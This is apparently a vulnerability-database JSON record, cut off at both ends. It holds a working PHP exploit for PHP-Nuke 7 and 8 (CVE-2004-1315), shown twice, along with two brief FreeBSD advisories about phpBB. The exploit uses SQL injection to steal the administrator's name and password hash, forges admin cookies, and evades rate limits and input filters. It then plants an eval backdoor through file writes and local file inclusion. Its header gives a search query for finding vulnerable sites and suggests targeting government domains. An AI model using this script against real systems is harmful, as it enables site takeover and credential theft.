escalation attack!!!\\n";\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response);\r\n $aid=explode("<",$aid);\r\n $pwd=explode("<",$pwd);\r\n $user_name=$aid[0];\r\n $pass_hash=$pwd[0];\r\n }\r\n }\r\n }else{\r\n $sex->sleep="sleep(5)";\r\n print "Starting Attack Against:".$attack_url."/\\n";\r\n print "Testing for blind sql injection...\\n";\r\n if(!$sex->test_target()){\r\n print("Target might be running 8.1.35\\n");\r\n print("Try the privilege esciation attack to upload the shell:");\r\n die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n");\r\n }\r\n print "Target is vulnerable to blind sql injection!!!\\n";\r\n print "Please Standby For Attack...\\n";\r\n $pass_hash=$sex->find_md5("pwd");\r\n $user_name=$sex->find_string("aid");\r\n print "attacked used:".$sex->request_count." requests.\\n";\r\n }\r\n print "Found Admin's name:".$user_name."\\n";\r\n print "Found MD5 Password hash:".$pass_hash."\\n";\r\n $admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";\r\n }\r\n print "Using Admin Session ID:\\n".$admin_cookie."\\n";\r\n $http->cookie=$admin_cookie;\r\n //ipban.php\r\n sleep(3);\r\n //This request will tell us what version of php-nuke it is.\r\n //If it is 8, Then the page gives us configuration information to perserve.\r\n $admin_options=$http->send($attack_url."/admin.php?op=general");\r\n if(!strstr($admin_options,"Content-Length: 0")){\r\n print "PHP-Nuke 8 detected.\\n";\r\n $option_values=explode("value='",$admin_options);\r\n $x=0;\r\n array_shift($option_values);\r\n //Parsing out and storing configuration values to restore them after the hack.\r\n foreach( $option_values as $value){\r\n $value=explode("'",$value);\r\n $values[]=urlencode($value[0]);\r\n if($x++==4)\r\n break;\r\n }\r\n //ipban.php\r\n sleep(2);\r\n //Enable error reporting\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";\r\n $error_reporting=$http->send($attack_url."/admin.php");\r\n //Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].\r\n $http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";\r\n $remote_path=$http->getPath($attack_url."/admin.php",3);\r\n sleep(2);\r\n if(strstr($remote_path,':\\\\')){\r\n print "Windows box detected.\\n";\r\n print "Remote path:$remote_path\\n";\r\n print "Uploading backdoor...\\n";\r\n $remote_path=addslashes(addslashes($remote_path."\\\\frontend.php"));\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';\r\n //Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.\r\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");\r\n $re=$http->send($attack_url."/admin.php?op=modifyUser");\r\n //Disable error reporting\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";\r\n $error_reporting=$http->send($attack_url."/admin.php");\r\n }else{\r\n print "*nix box detected.\\n";\r\n print "Remote path:$remote_path\\n";\r\n //Is mysql on the same machine as the httpd?\r\n sleep(2);\r\n $http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");\r\n $mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");\r\n if(strstr($mysql_check,"User Doesn't Exists!")){\r\n print("MySQL isn't on the same machine or you do not have file privileges.\\n");\r\n die("Remote code execution failed\\n");\r\n }\r\n print "Uploading backdoor...\\n";\r\n //ipban.php\r\n sleep(2);\r\n //Grab the theme, this is needed to repair the database after the LFI\r\n $theme=$http->send($attack_url."/admin.php?op=themes");\r\n $theme=explode('src="themes/',$theme);\r\n $theme=explode('/images/',$theme[1]);\r\n //Repair the database after the LFI.\r\n $backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';\r\n //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';\r\n //Install the backdoor in a relitive directory.\r\n $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';\r\n //charEncode is used to bypass XSS filters.\r\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");\r\n $http->send($attack_url."/admin.php?op=modifyUser");\r\n sleep(2);\r\n //local file include vulnerablity to execute /tmp/theme.php\r\n $http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";\r\n $http->send($attack_url."/admin.php");\r\n sleep(2);\r\n $http->postdata='';\r\n //Fire off a get request to trigger the uploaded php file using LFI\r\n $http->send($attack_url);\r\n sleep(2);\r\n //Try the LFI again, just in case.\r\n $http->send($attack_url."/admin.php");\r\n }\r\n sleep(2);\r\n //test if the backdoor works, try and clean up after the exploit.\r\n $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));\r\n if(strstr($test_backdoor,"31337")){\r\n print "Remote Code execution tested successfully:\\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\\n";\r\n }else{\r\n print "Backdoor install failed!\\n";\r\n }\r\n }else{\r\n ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.\r\n print "PHP-Nuke 7 detected.\\n";\r\n $http->postdata="";//send get requests.\r\n //Fire off a check for CVE-2004-1315, phpbb maybe installed.\r\n //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527\r\n //php-nuke was not vulnerable to this because of mainfile line 50: \\([^>]*"?[^)]*\\)\r\n //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527\r\n $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");\r\n //if the exploit didn't work, then we might have to enable phpbb and populate it.\r\n if(!strstr($try_exploit,"20041315")){\r\n //Enalbe PHPBB\r\n $http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");\r\n //create a new category for phpbb\r\n $http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";\r\n $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");\r\n //ipban.php\r\n sleep(2);\r\n //create a new form in the new category\r\n $http->postdata="forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";\r\n $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");\r\n $http->postdata="forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";\r\n $http->send($attack_url."/modules/Forums/admin/admin_forums.php?");\r\n //create a new topic in the new form\r\n $http->postdata="username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";\r\n $http->send($attack_url."/modules.php?name=Forums&file=posting");\r\n //ipban.php\r\n sleep(2);\r\n //access the first topic.\r\n $http->postdata="";\r\n //Check to see if any of the first 10 topics are exploitable.\r\n for($t=1;$t<10&&!strstr($try_exploit,"20041315");$t++){\r\n //Fire off a check for CVE-2004-1315.\r\n $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");\r\n }\r\n }\r\n //Check if we where able to hit CVE-2004-1315.\r\n if(strstr($try_exploit,"20041315")){\r\n print("Remote Code execution tested successfully:\\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\\nThis is a Doulbe urlencode()\\n");\r\n }else{\r\n print("Remote code execution has failed!\\n");\r\n }\r\n }\r\n}\r\nmain();\r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19556", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:21", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1315"], "description": "\nThe ChangeLog for phpBB 2.0.11 states:\n\nChanges since 2.0.10\n\nFixed vulnerability in highlighting code (very\n\t high severity, please update your installation as soon\n\t as possible)\nFixed unsetting global vars - Matt\n\t Kavanagh\nFixed XSS vulnerability in username handling\n\t - AnthraX101\nFixed not confirmed sql injection in username handling\n\t - warmth\nAdded check for empty topic id in topic_review\n\t function\nAdded visual confirmation mod to code base\n\n\nAdditionally, a US-CERT Technical Cyber Security Alert reports:\n\nphpBB contains an user input validation problem with\n\t regard to the parsing of the URL. An intruder can deface a\n\t phpBB website, execute arbitrary commands, or gain\n\t administrative privileges on a compromised bulletin\n\t board.\n\n", "edition": 4, "modified": "2005-01-24T00:00:00", "published": "2004-11-18T00:00:00", "id": "E3CF89F0-53DA-11D9-92B7-CEADD4AC2EDD", "href": "https://vuxml.freebsd.org/freebsd/e3cf89f0-53da-11d9-92b7-ceadd4ac2edd.html", "title": "phpbb -- arbitrary command execution and other vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:55", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2086"], "description": "\nFrSIRT Advisory reports:\n\nA vulnerability was identified in phpBB, which\n\t may be exploited by attackers to compromise a vulnerable\n\t web server. This flaw is due to an input validation error\n\t in the \"viewtopic.php\" script that does not properly filter\n\t the \"highlight\" parameter before calling the \"preg_replace()\"\n\t function, which may be exploited by remote attackers to execute\n\t arbitrary PHP commands with the privileges of the web server.\n\n", "edition": 4, "modified": "2005-07-07T00:00:00", "published": "2005-06-28T00:00:00", "id": "4AFACCA1-EB9D-11D9-A8BD-000CF18BBE54", "href": "https://vuxml.freebsd.org/freebsd/4afacca1-eb9d-11d9-a8bd-000cf18bbe54.html", "title": "phpbb -- remote PHP code execution vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:41", "description": "\nPHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution", "edition": 1, "published": "2010-05-05T00:00:00", "title": "PHP-Nuke 7.08.18.1.35 - Wormable Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2010-05-05T00:00:00", "id": "EXPLOITPACK:BBDA1FCCF1A50F524FDB4580900D8ADD", "href": "", "sourceData": "#!/usr/bin/php\n<?php\n/*******************************************************************************\nWormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)\nVendor's Website:http://phpnuke.org/\nSecuirty Researcher: Michael Brooks (https://sitewat.ch)\nOriginal Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html\n\nGoogle hack:\n\"Francisco Burzi\" \"Page Generation:\" Seconds inurl:modules.php\n1,170,000 results\nadd inurl:gov to the google hack if you want to make the news ;)\nWorks with maigic_quotes_gpc=On or Off\nWorks with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04\nMy own LFI+SQLI attack is used to bypass AppArmor!\nAlso tested XAMPP on Windows XP\nAll tests where done with MySQL5 and PHP5\nTo obtain a user's cookie:\n1) Register a normal account\n2) Login\n3) Type this into the same address bar and hit enter: javascript:document.cookie\nTo set a cookie you can do use this: javascript:document.cookie=\"admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2\"\n*******************************************************************************/\nset_time_limit(0);\n//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.\nclass php_nuke_blind_sql_injection extends blind_sql_injection {\n //This is the blind sql injection request.\n function query($check){\n //Rate limiter to bypass ipban.php's protection.\n //Must stay below 5 requests every 2 seconds.\n if(!($this->request_count%4)){\n sleep(2);\n }\n //build the http request to Inject a query:\n //This is a simple get request with a custom referer\n\t //$this->set_referer(\"'=\"/\\*\" (select \".$check.\" from nuke_authors limit 1))-- */\");\n $this->set_referer(\"'=(select \".$check.\" from nuke_authors limit 1))-- 1\");\n /*example get and post request.\n *$this->set_get(\"id=1 or (select \".$check.\" from nuke_authors limit 1))\";//$_GET[id]\n *$this->set_post(\"id=1 or (select \".$check.\" from nuke_authors limit 1))\");//$_POST[id]\n */\n }\n}\n//This is a very efficient blind sql injection class. \nclass blind_sql_injection{\n var $url, $backup_url, $result, $http, $request_count, $timeout;\n function blind_sql_injection($url,$timeout=10){\n $this->request_count=0;\n $this->url=$url;\n $this->backup_url=$url;\n $this->http=new http_client();\n $this->timeout=$timeout;\n }\n function set_get($get){\n $this->url=$this->url.\"?\".$get;\n }\n function set_referer($referer){\n $this->http->referer=$referer;\n }\n function set_post($post){\n $this->http->postdata=$post;\n }\n function test_target(){\n return $this->send(\"if(true,sleep(\".$this->timeout.\"),0)\")&&!$this->send(\"if(false,sleep(\".$this->timeout.\"),0)\");\n }\n function num_to_hex($arr){\n $ret='';\n foreach($arr as $a){\n if($a<=9){\n $ret.=$a;\n }else{\n $ret.=chr(87+$a);\n }\n }\n return $ret;\n }\n //Looking for a string of length 32 and base 16 in ascii chars.\n function find_md5($column){\n return $this->num_to_hex($this->bin_finder(16,32,\"conv(substring($column,%s,1),16,10)\"));\n }\n function find_sha1($column){\n return $this->num_to_hex($this->bin_finder(16,40,\"conv(substring($column,%s,1),16,10)\"));\n }\n //Look for an ascii string of arbitrary length.\n function find_string($column){\n $ret='';\n //A length of zero means we are looking for a null byte terminated string.\n $result=$this->bin_finder(128,0,\"ascii(substring($column,%s,1))\");\n foreach($result as $r){\n $ret.=chr($r);\n }\n return $ret;\n }\n //query() is a method that generates the sql injection request\n function query($check){\n //This function must be overridden.\n }\n function recheck($result,$question,$base){\n $this->bin_finder($base,1,$question,$start);\n //Force a long timeout.\n $tmp_timeout=$this->timeout;\n if($this->timeout<10){\n $this->timeout=10;\n }else{\n $this->timeout=$this->timeout*2;\n }\n $l=1;\n foreach($result as $r){\n if($this->send(\"if(\".sprintf($question,$l).\"!=\".$r.\",sleep(\".$this->timeout.\"),0)\")){\n $result[]=$b;\n break;\n }\n $l++;\n }\n $this->timeout=$tmp_timeout;\n }\n function linear_finder($base,$length,$question){\n for($l=1;$l<=$length;$l++){\n for($b=0;$b<$base;$b++){\n if($this->send(\"if(\".sprintf($question,$l).\"=\".$b.\",sleep(\".$this->timeout.\"),0)\")){\n $result[]=$b;\n break;\n }\n }\n }\n }\n #Binary search for mysql based sql injection.\n function bin_finder($base,$length,$question){\n $start_pos=1;\n $result='';\n for($cur=$start_pos;$cur<=$length||$length==0;$cur++){\n $n=$base-1;\n $low=0;\n $floor=$low;\n $high=$n-1;\n $pos= $low+(($high-$low)/2);\n $found=false;\n while($low<=$high&&!$found){\n #asking the sql database if the current value is greater than $pos\n if($this->send(\"if(greatest(\".sprintf($question,$cur).\",\".$pos.\")!=\".$pos.\",sleep(\".$this->timeout.\"),0)\")){\n #if this is true then the value must be the modulus.\n if($pos==$n-1){\n $result[]=$pos+1;\n $found=true;\n }else{\n $low=$pos+1;\n }\n #asking the sql database if the current value is less than $pos\n }else if($this->send(\"if(least(\".sprintf($question,$cur).\",\".$pos.\")!=\".$pos.\",sleep(\".$this->timeout.\"),0)\")){\n #if this is true the value must be zero, or in the case of ascii, a null byte.\n if($pos==$floor+1){\n $found=true;\n #We have found the null terminator so we have finnished our search for a string.\n if($length==0){\n $length=-1;\n }else{\n $result[]=$pos-1;\n }\n }else{\n $high=$pos-1;\n }\n }else{\n #both greater than and less then where asked, so so then the answer is our guess $pos.\n $result[]=$pos;\n $found=true;\n }\n $pos=$low+(($high-$low)/2);\n }\n print(\".\");\n }\n return $result;\n }\n //Fire off the request\n function send($quesiton){\n //build the injected query.\n $this->query($quesiton);\n $start=time();\n $resp=$this->http->send($this->url);\n //backup_url is for set_get()\n $this->url=$this->backup_url;\n $this->request_count++;\n return (time()-$start>=$this->timeout);\n }\n //retroGod RIP\n function charEncode($string){\n $char=\"char(\";\n $size=strlen($string);\n for($x=0;$x<$size;$x++){\n $char.=ord($string[$x]).\",\";\n }\n $char[strlen($char)-1]=\")%00\";\n return $char;\n }\n}\n//General purpose http client that works on a default php install. \nclass http_client{\n var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';\n function send($loc){\n //overload function polymorphism between gets and posts\n $url=parse_url($loc);\n if(!isset($url['port'])){\n $url['port']=80;\n }\n $ua='Firefox';\n if($this->proxy_ip!=''&&$this->proxy_port!=''){\n $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );\n $url['path']=$url['host'].':'.$url['port'].$url['path'];\n }else{\n $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );\n }\n if( !$fp ) {\n print \"$errstr ($errno)<br>\\nn\";\n return false;\n } else {\n if( $this->postdata=='' ) {\n $request=\"GET \".$url['path'].\"?\".$url['query'].\" HTTP/1.1\\r\\n\";\n } else {\n $request=\"POST \".$url['path'].\"?\".$url['query'].\" HTTP/1.1\\r\\n\";\n }\n if($this->proxy_name!=''&&$this->proxy_pass!=''){\n $request.=\"Proxy-Authorization: Basic \".base64_encode($this->proxy_name.\":\".$this->proxy_pass).\"\\r\\n\\r\\n\";\n }\n $request.=\"Host: \".$url['host'].\":\".$url['port'].\"\\r\\n\";\n $request.=\"User-Agent: \".$ua.\"\\r\\n\";\n $request.=\"Accept: text/plain\\r\\n\";\n if($this->referer!=''){\n $request.=\"Referer: \".$this->referer.\"\\r\\n\";\n }\n $request.=\"Connection: Close\\r\\n\";\n if($this->cookie!=''){\n $request.=\"Cookie: \".$this->cookie.\"\\r\\n\" ;\n }\n if( $this->postdata!='' ) {\n $strlength = strlen( $this->postdata );\n $request.=\"Content-type: application/x-www-form-urlencoded\\r\\n\" ;\n $request.=\"Content-length: \".$strlength.\"\\r\\n\\r\\n\";\n $request.=$this->postdata;\n }\n fputs( $fp, $request.\"\\r\\n\\r\\n\" );\n while( !feof( $fp ) ) {\n $output .= fgets( $fp, 1024 );\n }\n fclose( $fp );\n //php_nuke only:\n if(strstr($output,\"too many page loads\")){\n print \"REQUEST CAP HIT!\\n\";\n print_r(debug_backtrace());\n print \"REQUEST CAP HIT!\\n\";\n die();\n }\n return $output;\n }\n }\n //Use a http proxy\n function proxy($proxy){ //user:pass@ip:port\n $proxyAuth=explode('@',$proxy);\n if(isset($proxyAuth[1])){\n $login=explode(':',$proxyAuth[0]);\n $this->proxy_name=$login[0];\n $this->proxy_pass=$login[1];\n $addr=explode(':',$proxyAuth[1]);\n }else{\n $addr=explode(':',$proxy);\n }\n\t $this->proxy_ip=$addr[0];\n $this->proxy_port=$addr[1];\n }\n //Parses the results from a PHP error to use as a path disclosure.\n function getPath($url,$pops=1){\n $html=$this->send($url);\n //Regular error reporting:\n $resp=explode(\"array given in <b>\",$html);\n if(isset($resp[1])){\n $resp = explode(\"</b>\",$resp[1]);\n }else{\n //xdebug's error reporting:\n $resp=explode(\"array given in \",$html);\n if(isset($resp[1])){\n $resp = explode(\" \",$resp[1]);\n }else{\n $resp[0]=false;\n }\n }\n $path=$resp[0];\n //Can't use dirname()\n if(strstr($path,\"\\\\\")){\n $p=explode(\"\\\\\",$path);\n for($x=0;$x<$pops;$x++){\n array_pop($p);\n }\n $path=implode(\"\\\\\",$p);\n }else{\n $p=explode(\"/\",$path);\n for($x=0;$x<$pops;$x++){\n array_pop($p);\n }\n $path=implode(\"/\",$p);\n }\n return $path;\n }\n //Grab the server type from the http header.\n function getServer($url){\n $resp=$this->send($url);\n $header=explode(\"Server: \",$resp);\n $server=explode(\"\\n\",$header[1]);\n return $server[0];\n }\n}\nfunction main(){\n $user_input=getopt(\"t:c:a:\");\n if($user_input['t']){\n $attack_url=$user_input['t'];\n if($user_input['c']){\n $user_cookie=$user_input['c'];\n }\n //This is only useful for debugging, so its not listed in the useage.\n if($user_input['a']){\n $admin_cookie=$user_input['a'];\n }\n }else{\n print(\"Useage: ./php_exploit -t http://localhost\\n\");\n die(\"A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n\");\n }\n $attack_url=str_replace(\"index.php\",\"\",$attack_url);\n $http=new http_client();\n $sex=new php_nuke_blind_sql_injection($attack_url.\"/\");\n if(!$admin_cookie){\n\t //This is what a cookie looks like:\n\t //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096\n\t //$user_cookie=\"user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2\";\n\t if($user_cookie){\n print \"Using cookie...\\n\";\n $http->cookie=$user_cookie;\n //1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.\n //This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.\n $http->postdata=\"title=wow\\\\&bodytext=/*&mood=\".urlencode(\"'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1\").\"&status=no&submit=Add+New+Entry\";\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\");\n //This part of the exploit is a bit strange sorry for the mess, gotta realease!\n if(strstr($response,\"javascript:history.go(-1)\")){\n //magic_quotes_gpc=on\n $http->postdata=\"title=wow&jbodytext=text&mood=\".urlencode(\"',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1\").\"&status=no&submit=Add+New+Entry\";\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\");\n $http->postdata='';\n //Find the primary key of the journal entry we just created.\n $jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\");\n //we should have the single quote that we escaped at the end of wow'\n $jid=explode(\"\\\">wow<\",$jid);\n $jid=explode(\"jid=\", $jid[0]);\n //Check the journal for the admin's username/password hash\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[1]);\n if(strpos($response,\"31337\")){\n list($junk,$aid,$pwd)=explode(\"31337 @ \",$response);\n $aid=explode(\"<\",$aid);\n $pwd=explode(\"<\",$pwd);\n $user_name=$aid[0];\n $pass_hash=$pwd[0];\n }else{\n //magic_quotes_gpc=off\n sleep(3);\n $http->postdata=\"title=wow\\\\&jbodytext=/*&mood=1&status=\".urlencode(\"no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1\").\"&submit=Add+New+Entry\";\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=savenew\");\n sleep(2);\n $jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\");\n $jid=explode(\"\\\">wow<\",$jid);\n $jid=explode(\"jid=\", $jid[0]);\n $jid=explode(\"\\\">\",$jid[1]);\n //Check the journal for the admin's username/password hash\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[0]);\n $inj=explode(\"Last updated on \",$response);\n $inj=explode(\" @ \",$inj[1]);\n $pass_hash=$inj[0];\n $inj=explode(\"<\",$inj[1]);\n $user_name=$inj[0];\n }\n }else{\n $http->postdata='';\n //Find the primary key of the journal entry we just created.\n $jid=$http->send($attack_url.\"/modules.php?name=Journal&file=edit\");\n //we should have the single quote that we escaped at the end of wow'\n $jid=explode(\"\\\">wow',<\",$jid);\n $jid=explode(\"jid=\", $jid[0]);\n //Check the journal for the admin's username/password hash\n $response=$http->send($attack_url.\"/modules.php?name=Journal&file=display&jid=\".$jid[1]);\n if(!strpos($response,\"31337\")){\n die(\"target has patched!\\n\");\n }else{\n print \"Target vulnerable to a privilege escalation attack!!!\\n\";\n list($junk,$aid,$pwd)=explode(\"31337 @ \",$response);\n $aid=explode(\"<\",$aid);\n $pwd=explode(\"<\",$pwd);\n $user_name=$aid[0];\n $pass_hash=$pwd[0];\n }\n }\n\t }else{\n $sex->sleep=\"sleep(5)\";\n print \"Starting Attack Against:\".$attack_url.\"/\\n\";\n print \"Testing for blind sql injection...\\n\";\n if(!$sex->test_target()){\n print(\"Target might be running 8.1.35\\n\");\n print(\"Try the privilege esciation attack to upload the shell:\");\n die(\"./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n\");\n }\n print \"Target is vulnerable to blind sql injection!!!\\n\";\n print \"Please Standby For Attack...\\n\";\n $pass_hash=$sex->find_md5(\"pwd\");\n $user_name=$sex->find_string(\"aid\");\n print \"attacked used:\".$sex->request_count.\" requests.\\n\";\n\t }\n\t print \"Found Admin's name:\".$user_name.\"\\n\";\n\t print \"Found MD5 Password hash:\".$pass_hash.\"\\n\";\n\t $admin_cookie=\"admin=\".base64_encode($user_name.\":\".$pass_hash.\":\").\";\";\n }\n print \"Using Admin Session ID:\\n\".$admin_cookie.\"\\n\";\n $http->cookie=$admin_cookie;\n //ipban.php\n sleep(3);\n //This request will tell us what version of php-nuke it is.\n //If it is 8, Then the page gives us configuration information to perserve.\n $admin_options=$http->send($attack_url.\"/admin.php?op=general\");\n if(!strstr($admin_options,\"Content-Length: 0\")){\n print \"PHP-Nuke 8 detected.\\n\";\n $option_values=explode(\"value='\",$admin_options);\n $x=0;\n array_shift($option_values);\n //Parsing out and storing configuration values to restore them after the hack. \n foreach( $option_values as $value){\n $value=explode(\"'\",$value);\n $values[]=urlencode($value[0]);\n if($x++==4)\n break;\n }\n //ipban.php\n sleep(2);\n //Enable error reporting\n $http->postdata=\"xsitename=\".$values[0].\"&xnukeurl=\".$values[1].\"&xslogan=\".$values[2].\"&xstartdate=\".$values[3].\"&xadmingraphic=\".$values[4].\"&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral\";\n $error_reporting=$http->send($attack_url.\"/admin.php\");\n //Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].\n $http->postdata=\"add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor\";\n $remote_path=$http->getPath($attack_url.\"/admin.php\",3);\n sleep(2);\n if(strstr($remote_path,':\\\\')){\n print \"Windows box detected.\\n\";\n print \"Remote path:$remote_path\\n\";\n print \"Uploading backdoor...\\n\";\n $remote_path=addslashes(addslashes($remote_path.\"\\\\frontend.php\"));\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET[\"e\"])):eval($_GET[\"e\"])';\n //Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\n $http->postdata=\"chng_uid=\".urlencode(\"' union/**/ select \".$sex->charEncode(\"<?php\").\",'\".$backdoor.\"',\".$sex->charEncode(\"?>\").\",'','','','','','','','','','','','','','','' into outfile '\".$remote_path.\"'-- 1\");\n $re=$http->send($attack_url.\"/admin.php?op=modifyUser\");\n //Disable error reporting\n $http->postdata=\"xsitename=\".$values[0].\"&xnukeurl=\".$values[1].\"&xslogan=\".$values[2].\"&xstartdate=\".$values[3].\"&xadmingraphic=\".$values[4].\"&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral\";\n $error_reporting=$http->send($attack_url.\"/admin.php\");\n }else{\n print \"*nix box detected.\\n\";\n print \"Remote path:$remote_path\\n\";\n //Is mysql on the same machine as the httpd?\n sleep(2);\n $http->postdata=\"chng_uid=\".urlencode(\"' or 1=(select if(substring(load_file('\".$remote_path.\"/index.php'),1,1)='<',0,1))-- 1\");\n $mysql_check=$http->send($attack_url.\"/admin.php?op=modifyUser\");\n if(strstr($mysql_check,\"User Doesn't Exists!\")){\n print(\"MySQL isn't on the same machine or you do not have file privileges.\\n\");\n die(\"Remote code execution failed\\n\");\n }\n print \"Uploading backdoor...\\n\";\n //ipban.php\n sleep(2);\n //Grab the theme, this is needed to repair the database after the LFI\n $theme=$http->send($attack_url.\"/admin.php?op=themes\");\n $theme=explode('src=\"themes/',$theme);\n $theme=explode('/images/',$theme[1]);\n //Repair the database after the LFI.\n 